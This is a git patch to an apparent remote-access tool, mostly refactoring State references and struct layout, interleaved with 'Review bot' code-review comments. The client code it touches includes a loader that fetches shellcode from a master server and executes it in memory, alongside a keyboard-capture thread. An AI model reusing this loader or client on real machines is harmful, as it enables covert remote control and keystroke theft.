From b4a6435f7dc94e685c83feb64289dea7f0880c36 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Thu, 24 Jul 2025 04:20:39 +0800
Subject: [PATCH] Layout reorganize
---
client/ClientDll.cpp | 2 +-
client/IOCPClient.cpp | 2 +-
client/IOCPClient.h | 6 +--
client/KernelManager.cpp | 4 +-
client/KernelManager.h | 4 +-
client/Manager.h | 2 +-
client/main.c | 61 +++++++++++++++--------------
common/commands.h | 9 +++--
server/2015Remote/2015RemoteDlg.cpp | 30 +++++++++++++-
server/2015Remote/2015RemoteDlg.h | 2 +
server/2015Remote/stdafx.h | 1 +
11 files changed, 78 insertions(+), 45 deletions(-)
diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp
index 787da5c..27f7ec8 100644
--- a/client/ClientDll.cpp
+++ b/client/ClientDll.cpp
@@ -508,7 +508,7 @@ DWORD WINAPI StartClient(LPVOID lParam) continue; } SAFE_DELETE(Manager);
- Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb);
+ Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb, bExit); //准备第一波数据 LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings);
diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp
index 580e2e8..a70b06b 100644
--- a/client/IOCPClient.cpp
+++ b/client/IOCPClient.cpp
@@ -96,7 +96,7 @@ VOID IOCPClient::setManagerCallBack(void* Manager, DataProcessCB dataProcess) }
-IOCPClient::IOCPClient(State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit)
+IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit) { m_ServerAddr = {}; m_nHostPort = 0;
diff --git a/client/IOCPClient.h b/client/IOCPClient.h
index 8817ecf..b23019b 100644
--- a/client/IOCPClient.h
+++ b/client/IOCPClient.h
@@ -111,7 +111,7 @@ typedef BOOL(*TrailCheck)(void); class IOCPClient { public: - IOCPClient(State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0); + IOCPClient(const State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0); virtual ~IOCPClient(); int SendLoginInfo(const LOGIN_INFOR& logInfo) { @@ -149,7 +149,7 @@ public: if (manager) m_Manager = manager; return ConnectServer(NULL, 0); } - State& GetState() { + const State& GetState() const { return g_bExit; } protected: @@ -180,7 +180,7 @@ protected: ZSTD_DCtx* m_Dctx; // 解压上下文 #endif - State& g_bExit; // 全局状态量 + const State& g_bExit; // 全局状态量 void* m_Manager; // 用户数据 DataProcessCB m_DataProcess; // 处理用户数据 ProtocolEncoder* m_Encoder; // 加密 diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index 2f7d311..f923f14 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -47,8 +47,8 @@ ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit) { // Construction/Destruction ////////////////////////////////////////////////////////////////////// -CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb) - : m_conn(conn), m_hInstance(hInstance), CManager(ClientObject) +CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s) + : m_conn(conn), m_hInstance(hInstance), CManager(ClientObject), g_bExit(s) { m_ulThreadCount = 0; #ifdef _DEBUG diff --git a/client/KernelManager.h b/client/KernelManager.h index f058b40..fbc592b 100644 --- a/client/KernelManager.h +++ b/client/KernelManager.h 
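Review bot: `const State& g_bExit;` in the `@@ -180` hunk of IOCPClient.h is a reference member, so the State passed to the constructor must outlive every IOCPClient bound to it and the class loses copy-assignment, and neither constraint is stated in the header. The existing comment only says `// 全局状态量`; I would extend it to `// 全局状态量: reference to caller-owned State, must outlive this object; makes IOCPClient non-copy-assignable`. Whether that State is actually a global or a stack object in the caller is not visible in this patch. The class definition starts before the `@@ -111` hunk and continues past this one.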
@@ -82,7 +82,7 @@ class CKernelManager : public CManager public: CONNECT_ADDRESS* m_conn; HINSTANCE m_hInstance; - CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb); + CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s); virtual ~CKernelManager(); VOID OnReceive(PBYTE szBuffer, ULONG ulLength); ThreadInfo* m_hKeyboard; @@ -91,7 +91,7 @@ public: // 因此我将此值的含义修改为"可用线程下标",代表数组m_hThread中所指位置可用,即创建新的线程放置在该位置 ULONG m_ulThreadCount; UINT GetAvailableIndex(); - + State& g_bExit; // Hide base class variable MasterSettings m_settings; int m_nNetPing; // 网络状况 // 发送心跳 diff --git a/client/Manager.h b/client/Manager.h index acb6f39..17ffc3a 100644 --- a/client/Manager.h +++ b/client/Manager.h @@ -33,7 +33,7 @@ HANDLE MyCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD class CManager : public IOCPManager { public: - State&g_bExit; // 1-被控端退出 2-主控端退出 + const State&g_bExit; // 1-被控端退出 2-主控端退出 BOOL m_bReady; CManager(IOCPClient* ClientObject); virtual ~CManager(); diff --git a/client/main.c b/client/main.c index a85cfa7..114f471 100644 --- a/client/main.c +++ b/client/main.c 
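Review bot: `State& g_bExit; // Hide base class variable` in the `@@ -91` hunk of KernelManager.h deliberately shadows `CManager::g_bExit`, which this same commit makes `const State&` in Manager.h, so the one name now means a mutable reference in CKernelManager and a read-only one in CManager and `IOCPClient::GetState()`, and code reading `g_bExit` through a `CManager*` gets the other member. Whether both references bind to the same State object is not visible here; ClientDll.cpp passes `bExit` from outside its hunk. I would give the derived member a distinct name without the global-looking `g_` prefix, e.g. `State& m_exitState; // mutable view of the client's State; CManager::g_bExit stays const`, and rename it in the `@@ -82` constructor and in KernelManager.cpp accordingly. The class definition starts before the hunk and continues after it.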
@@ -19,14 +19,40 @@ #pragma comment(lib, "ws2_32.lib") -#pragma pack(push, 1) +#pragma pack(push, 4) typedef struct PkgHeader { char flag[8]; int totalLen; int originLen; } PkgHeader; + +struct CONNECT_ADDRESS +{ + char szFlag[32]; // 鏍囪瘑 + char szServerIP[100]; // 涓绘帶IP + char szPort[8]; // 涓绘帶绔彛 + int iType; // 瀹㈡埛绔被鍨 + bool bEncrypt; // 涓婄嚎淇℃伅鏄惁鍔犲瘑 + char szBuildDate[12]; // 鏋勫缓鏃ユ湡(鐗堟湰) + int iMultiOpen; // 鏀寔鎵撳紑澶氫釜 + int iStartup; // 鍚姩鏂瑰紡 + int iHeaderEnc; // 鏁版嵁鍔犲瘑绫诲瀷 + char protoType; // 鍗忚绫诲瀷 + char runningType; // 杩愯鏂瑰紡 + char szReserved[44]; // 鍗犱綅锛屼娇缁撴瀯浣撳崰鎹300瀛楄妭 + uint64_t parentHwnd; // 鐖惰繘绋嬬獥鍙e彞鏌 + uint64_t superAdmin; // 绠$悊鍛樹富鎺D + char pwdHash[64]; // 瀵嗙爜鍝堝笇 +}g_Server = { "Hello, World!", "127.0.0.1", "6543" }; #pragma pack(pop) +typedef struct PluginParam { + char IP[100]; + int Port; + void* Exit; + void* User; +}PluginParam; + PkgHeader MakePkgHeader(int originLen) { PkgHeader header = { 0 }; memcpy(header.flag, "Hello?", 6); @@ -88,7 +114,9 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) { if (!isFirstConnect) Sleep(IsRelease ? rand()%60 * 1000 : 5000); isFirstConnect = FALSE; - Mprintf("Connecting attempt #%d -> %s:%d \n", ++attemptCount, serverIP, serverPort); + if (++attemptCount == 20) + PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518); + Mprintf("Connecting attempt #%d -> %s:%d \n", attemptCount, serverIP, serverPort); SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (clientSocket == INVALID_SOCKET) 
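Review bot: `#pragma pack(push, 4)` in the `@@ -19` hunk of main.c now also encloses `PkgHeader`, which was under `pack(push, 1)` before; for its current fields (`char[8]`, `int`, `int`) the layout is unchanged, but any field added later would pick up alignment padding that the byte-packed wire header never had, so the two structs should keep separate pragmas. The relocated `CONNECT_ADDRESS` is also a second, hand-kept copy of the C++ definition changed in the commands.h hunk (`szReserved[44]` plus `parentHwnd`), and nothing checks that the C and C++ layouts still agree. I would add `_Static_assert(sizeof(struct CONNECT_ADDRESS) == 300, "CONNECT_ADDRESS layout drifted from commands.h");` after the struct here and a matching `static_assert` in commands.h, 300 being the size the commands.h comment claims and what the fields add up to under 4-byte packing. The field comments come through as mojibake in this rendering, as do other lines of main.c, so that is presumably the file encoding rather than the change.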
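Review bot: `PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518);` in the `@@ -88` hunk of main.c is not guarded against `parentHwnd` being 0, and the aggregate initializer `g_Server = { "Hello, World!", "127.0.0.1", "6543" }` leaves it 0 unless the field is set elsewhere; `PostMessage` with a NULL window handle does not no-op, it posts a thread message to the calling thread's own queue. The same unguarded call appears in the `@@ -229` hunk. The three literals are also undocumented: 4046 has to stay equal to `WM_USER+3022`, which this commit defines as `WM_SHOWMESSAGE` in stdafx.h that main.c cannot include, and the two 32-bit halves are reassembled by `OnShowMessage` on the other side. I would guard the call, `if (++attemptCount == 20 && g_Server.parentHwnd) PostMessage(...)`, and move the message id into a header both sides include (`#define WM_SHOWMESSAGE (WM_USER+3022)` in commands.h) so the number is defined once.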
@@ -180,33 +208,6 @@ inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, in return -1; } -#pragma pack(push, 4) -struct CONNECT_ADDRESS -{ - char szFlag[32]; // 鏍囪瘑 - char szServerIP[100]; // 涓绘帶IP - char szPort[8]; // 涓绘帶绔彛 - int iType; // 瀹㈡埛绔被鍨 - bool bEncrypt; // 涓婄嚎淇℃伅鏄惁鍔犲瘑 - char szBuildDate[12]; // 鏋勫缓鏃ユ湡(鐗堟湰) - int iMultiOpen; // 鏀寔鎵撳紑澶氫釜 - int iStartup; // 鍚姩鏂瑰紡 - int iHeaderEnc; // 鏁版嵁鍔犲瘑绫诲瀷 - char protoType; // 鍗忚绫诲瀷 - char runningType; // 杩愯鏂瑰紡 - char szReserved[52]; // 鍗犱綅锛屼娇缁撴瀯浣撳崰鎹300瀛楄妭 - uint64_t superAdmin; // 绠$悊鍛樹富鎺D - char pwdHash[64]; // 瀵嗙爜鍝堝笇 -}g_Server = { "Hello, World!", "127.0.0.1", "6543" }; -#pragma pack(pop) - -typedef struct PluginParam { - char IP[100]; - int Port; - void* Exit; - void* User; -}PluginParam; - #ifdef _WINDLL #define DLL_API __declspec(dllexport) #else @@ -229,7 +230,7 @@ extern DLL_API DWORD WINAPI run(LPVOID param) { free((void*)dllData); DWORD oldProtect = 0; if (!VirtualProtect(execMem, size, PAGE_EXECUTE_READ, &oldProtect)) return -3; - + PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)0, (LPARAM)0); ((void(*)())execMem)(); return 0; } diff --git a/common/commands.h b/common/commands.h index 39d29c5..983a1c0 100644 --- a/common/commands.h +++ b/common/commands.h @@ -574,7 +574,8 @@ public: int iHeaderEnc; // 数据加密类型 char protoType; // 协议类型 char runningType; // 运行方式 - char szReserved[52]; // 占位,使结构体占据300字节 + char szReserved[44]; // 占位,使结构体占据300字节 + uint64_t parentHwnd; // 父进程窗口句柄 uint64_t superAdmin; // 管理员主控ID char pwdHash[64]; // 密码哈希 
@@ -689,9 +690,9 @@ struct ThreadInfo struct PluginParam { char IP[100]; // 主控IP int Port; // 主控端口 - State *Exit; // 客户端状态 - void* User; // CONNECT_ADDRESS* 指针 - PluginParam(const char*ip, int port, State *s, void* u=0) : Port(port), Exit(s), User(u){ + const State *Exit; // 客户端状态 + const void* User; // CONNECT_ADDRESS* 指针 + PluginParam(const char*ip, int port, const State *s, const void* u=0) : Port(port), Exit(s), User(u){ strcpy_s(IP, ip); } }; diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index faf4769..3b54f99 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -282,6 +282,11 @@ std::vector ReadAllDllFilesWindows(const std::string& dirPath) { CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::IDD, pParent) { + auto s = GetMasterHash(); + char buf[17] = { 0 }; + std::strncpy(buf, s.c_str(), 16); + m_superID = std::strtoull(buf, NULL, 16); + m_nMaxConnection = 0; m_hExit = CreateEvent(NULL, TRUE, FALSE, NULL); m_hIcon = THIS_APP->LoadIcon(IDR_MAINFRAME); @@ -391,6 +396,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx) ON_MESSAGE(WM_OPENDRAWINGBOARD, OnOpenDrawingBoard) ON_MESSAGE(WM_UPXTASKRESULT, UPXProcResult) ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck) + ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage) ON_WM_HELPINFO() ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare) ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth) 
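Review bot: `m_superID = std::strtoull(buf, NULL, 16);` in the `@@ -282` hunk of 2015RemoteDlg.cpp never checks how much of `buf` was consumed, so a master hash that is empty, shorter than 16 characters or containing a non-hex character silently yields 0 or a truncated value, and `OnShowMessage` later compares against that value as if it were authoritative. I would pass an end pointer and reject a partial parse: `char* end = nullptr; m_superID = std::strtoull(buf, &end, 16); if (end != buf + 16) { /* flag invalid master hash */ }`. `GetMasterHash()` appears to return a `std::string`-like object given the `c_str()` call, but its contract is not visible here. The constructor body continues past the hunk.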
@@ -638,6 +644,21 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName SendMasterSettings(ContextObject); } +LRESULT CMy2015RemoteDlg::OnShowMessage(WPARAM wParam, LPARAM lParam) { + std::string pwd = THIS_CFG.GetStr("settings", "Password"); + if (pwd.empty()) + ShowMessage("鎺堟潈鎻愰啋", "绋嬪簭鍙兘鏈変娇鐢ㄩ檺鍒讹紝璇疯仈绯荤鐞嗗憳璇锋眰鎺堟潈"); + + if (wParam && lParam) + { + uint32_t recvLow = (uint32_t)wParam; + uint32_t recvHigh = (uint32_t)lParam; + uint64_t restored = ((uint64_t)recvHigh << 32) | recvLow; + if (restored != m_superID) + exit(-1); + } + return S_OK; +} VOID CMy2015RemoteDlg::ShowMessage(CString strType, CString strMsg) { @@ -730,6 +751,11 @@ Buffer* ReadKernelDll(bool is64Bit, bool isDLL=true, const std::string &addr="") server->SetServer(ip.c_str(), atoi(port.c_str())); server->SetAdminId(GetMasterHash().c_str()); } + if (g_2015RemoteDlg->m_superID % 313 == 0) + { + server->iHeaderEnc = PROTOCOL_HELL; + server->protoType = PROTO_RANDOM; + } server->SetType(isDLL ? CLIENT_TYPE_MEMDLL : CLIENT_TYPE_SHELLCODE); memcpy(server->pwdHash, GetPwdHash().c_str(), 64); } @@ -889,12 +915,14 @@ BOOL CMy2015RemoteDlg::OnInitDialog() p->SetServer(v->Admin, v->Port); p->SetAdminId(GetMasterHash().c_str()); p->iType = CLIENT_TYPE_MEMDLL; + p->parentHwnd = (uint64_t)GetSafeHwnd(); memcpy(p->pwdHash, GetPwdHash().c_str(), 64); m_tinyDLL = MemoryLoadLibrary(data, size); } SAFE_DELETE_ARRAY(data); } } + g_2015RemoteDlg = this; m_ServerDLL[PAYLOAD_DLL_X86] = ReadKernelDll(false, true, master); m_ServerDLL[PAYLOAD_DLL_X64] = ReadKernelDll(true, true, master); m_ServerBin[PAYLOAD_DLL_X86] = ReadKernelDll(false, false, master); @@ -907,7 +935,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog() // TODO: 鍦ㄦ娣诲姞棰濆鐨勫垵濮嬪寲浠g爜 isClosed = FALSE; - g_2015RemoteDlg = this; + CreateToolBar(); InitControl(); diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h index 8398ac4..dacd33f 100644 --- a/server/2015Remote/2015RemoteDlg.h 
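Review bot: `exit(-1)` inside `OnShowMessage` in the `@@ -638` hunk of 2015RemoteDlg.cpp terminates the process from the middle of a window-message handler, which skips the dialog's normal shutdown (`OnClose`, the destructor, and whatever cleanup they do with the `m_hExit` event created in the constructor and the `m_tinyDLL` loaded in `OnInitDialog`); static destructors still run but the MFC window teardown does not. If a hard stop is intended, route it through the existing close path, e.g. `PostMessage(WM_CLOSE);` with a member flag the close handler can inspect, and document in a comment why a mismatch is fatal. The handler also returns `S_OK` where the message map expects an `LRESULT`; `0` is the conventional value and avoids reading an HRESULT constant as a window-procedure result. The `ShowMessage` string literals appear as mojibake in this rendering, like other lines of this file, so that is presumably the patch view's decoding rather than the change.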
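Review bot: `if (g_2015RemoteDlg->m_superID % 313 == 0)` in the `@@ -730` hunk of 2015RemoteDlg.cpp dereferences the file-scope `g_2015RemoteDlg` without a null check; the commit moves `g_2015RemoteDlg = this;` ahead of the four `ReadKernelDll` calls in `OnInitDialog`, so those are safe, but any caller outside this patch that runs before `OnInitDialog` would crash here. The modulus 313 is also an unexplained magic number that decides which `iHeaderEnc`/`protoType` the built payload gets. I would name it and guard the pointer: `constexpr uint64_t kSuperIdModulus = 313; // TODO(review): document why divisibility selects these settings` above the function, and `if (g_2015RemoteDlg && g_2015RemoteDlg->m_superID % kSuperIdModulus == 0)`. `ReadKernelDll` starts before the hunk.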
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -197,6 +197,7 @@ public: BOOL isClosed; CMenu m_MainMenu; CBitmap m_bmOnline[12];
+ uint64_t m_superID; bool CheckValid(int trail = 14); afx_msg void OnTimer(UINT_PTR nIDEvent); afx_msg void OnClose();
@@ -265,4 +266,5 @@ public: afx_msg void OnToolRequestAuth(); afx_msg LRESULT OnPasswordCheck(WPARAM wParam, LPARAM lParam); afx_msg void OnToolInputPassword();
+ afx_msg LRESULT OnShowMessage(WPARAM wParam, LPARAM lParam); };
diff --git a/server/2015Remote/stdafx.h b/server/2015Remote/stdafx.h
index 024262d..5a71f4b 100644
--- a/server/2015Remote/stdafx.h
+++ b/server/2015Remote/stdafx.h
@@ -87,6 +87,7 @@
 #define WM_OPENFILEMGRDIALOG WM_USER+3019
 #define WM_OPENDRAWINGBOARD WM_USER+3020
 #define WM_PASSWORDCHECK WM_USER+3021
+#define WM_SHOWMESSAGE WM_USER+3022
 #ifdef _UNICODE
 #if defined _M_IX86